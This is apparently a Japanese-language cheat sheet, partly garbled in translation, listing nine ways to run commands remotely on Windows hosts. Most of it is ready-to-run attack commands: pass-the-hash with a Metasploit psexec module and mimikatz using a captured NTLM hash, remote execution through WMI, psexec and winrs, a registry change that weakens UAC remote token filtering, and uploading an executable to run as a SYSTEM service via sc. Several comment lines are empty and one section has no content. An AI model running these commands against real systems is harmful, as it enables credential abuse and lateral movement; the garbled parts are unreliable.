Windowsリモートでcmdコマンドを実行する9つの方法
2919 ワード
一、リモート実行命令方式及び対応ポート:
IPC$+AT 445
PSEXEC 445
WMI 135
Winrm 5985(HTTP)&5986(HTTPS)
二、9種類のリモートでcmdコマンドを実行する方法:
1.WMIはコマンド方式を実行し、エコーなし:
wmic /node:192.168.1.158 /user:pt007 /password:admin123 process call create "cmd.exe /c ipconfig>d:\result.txt"
2.Hashを使用してWindowsに直接ログイン(HASH転送)
Windows hash値をキャプチャし、administratorのhash:598 DDCE 2660 D 3193 AAD 3 B 435 B 51404 EE:2 D 20 D 252 A 479 F 485 CDF 5 E 171 D 93985 BFを得る
msf payload:
use exploit/windows/smb/psexec
show options
set RHOST 192.168.81.129
set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF
set SMBUser Administrator
show options
run
3.mimikatzはhash方式接続+at計画タスク実行コマンドを渡す:
mimikatz.exe privilege::debug "sekurlsa::pth /domain:. /user:administrator /ntlm:2D20D252A479F485CDF5E171D93985BF" // hash
dir \\192.168.1.185\c$
4.WMIcmdはコマンドを実行し、表示されます.
WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"
プログラムのダウンロードアドレス:https://github.com/nccgroup/WMIcmd/releases
5.Cobalt strkieリモート実行コマンドとhash伝達攻撃:
6. psexec.exeリモート実行コマンド
psexec /accepteula //
sc delete psexesvc
psexec \\192.168.1.185 -u pt007 -p admin123 cmd.exe
7.psexec.vbsリモート実行コマンド
cscript psexec.vbs 192.168.1.158 pt007 admin123 "ipconfig"
8.winrmリモート実行コマンド
// winrm , 5985 :
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
netstat -ano|find "5985"
// :
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /all"
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 cmd
//UAC , , :
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
winrs -r:http://192.168.1.152:5985 -u:pt007 -p:admin123 "whoami /groups"
9.リモートコマンド実行sc
//ipc接続の確立(net use+atを参照)後、実行待ちのbatまたはexeプログラムをターゲットシステムにアップロードし、サービスを作成します(サービスを開始するとsystem権限でリモートシステム上でプログラムを実行します):
net use \\192.168.17.138\c$ "admin123" /user:pt007
net use
dir \\192.168.17.138\c$
copy test.exe \\192.168.17.138\c$
sc \\192.168.17.138 create test binpath= "c:\test.exe"
sc \\192.168.17.138 start test
sc \\192.168.17.138 del test